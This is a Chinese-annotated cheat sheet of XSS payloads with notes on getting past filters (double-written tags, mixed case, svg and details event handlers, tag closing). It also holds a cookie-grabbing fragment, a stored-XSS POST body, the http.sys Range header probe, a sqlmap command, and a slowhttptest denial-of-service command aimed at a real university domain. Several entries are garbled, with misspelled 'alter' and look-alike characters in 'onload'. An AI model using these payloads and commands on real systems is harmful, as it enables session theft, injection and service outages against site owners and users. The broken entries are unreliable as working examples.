XSS payload (大集合)
<script>alert(/xss/)</script>
<script>alert(&XSS&)</script>
<script>alert("XSS")</script>(代替被转义的“”)
<INPUT type="text"value='\'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>'>
<BODY οnlοad="alert('XSS')">
<IMGSRC=javascript:al

1;rt('XSS')>(Ascii)
<sc<script>ript>alert(/xss/)</script>双写绕过
<Script>alert(/xss/)</script>混淆大小写绕过
<img src=1 οnerrοr=alert(1)>
<IMG SRC=javascript:alert('XSS')>更换标签
>"<script>alert(/xss/)</script>闭合
"><script>alert(/xss/)</script>
<script>document.title%3D36048</script>
';document.title%3D54540//
lx=1'));alert(10558)//
'/><SCRIPT>alert("XSS")</SCRIPT>
'/><SCRIPT>alert("XSS")</SCRIPT><xssa='
cookie='+document.cookie;</script
1" οnclick=alert(1)// -用于镶嵌在input标签
<svg/οnlοad=alert(1)> -当空格和script等敏感字符被过滤后绕过检测
<details/open/οntοggle=top["al"+"ert"](1)> -当空格和script等敏感字符被过滤后绕过检测
<style οnlοad=alert(1)> -当script等敏感字符被过滤后绕过检测
<iframe src=javascript:alert`1`> -单引号被过滤后绕过检测
<bodyhttp.sys:响应包加一句Range: bytes=0-18446744073709551615
存储型XSS漏洞
POST上传方式
抓包放在底部id=&name=1&code=<script>alter('xss')<script>
stdCode=1&id=&code=<script>alter('xss')<script>
1;mode=block(启用XSS过滤。 如果检测到攻击,浏览器将不会清除页面,而是阻止页面加载。)
1; report=<reporting-URI> (Chromium only)(启用XSS过滤。 如果检测到跨站脚本攻击,浏览器将清除页面并使用CSP report-uri指令的功能发送违规报告。)
javascript:alert(document.cookie);放在url后面
./sqlmap.py -r search-test.txt -p tfUPass将post请求包打包为txt文件,再用sqlmap去跑
slowhttptest -c 1000 -X -g -o -slow_read_stats -r 200 -w 512 -y 1024 -n 5 -z 32 -k 3 -u http://my.ecus
t.edu.cn -p 3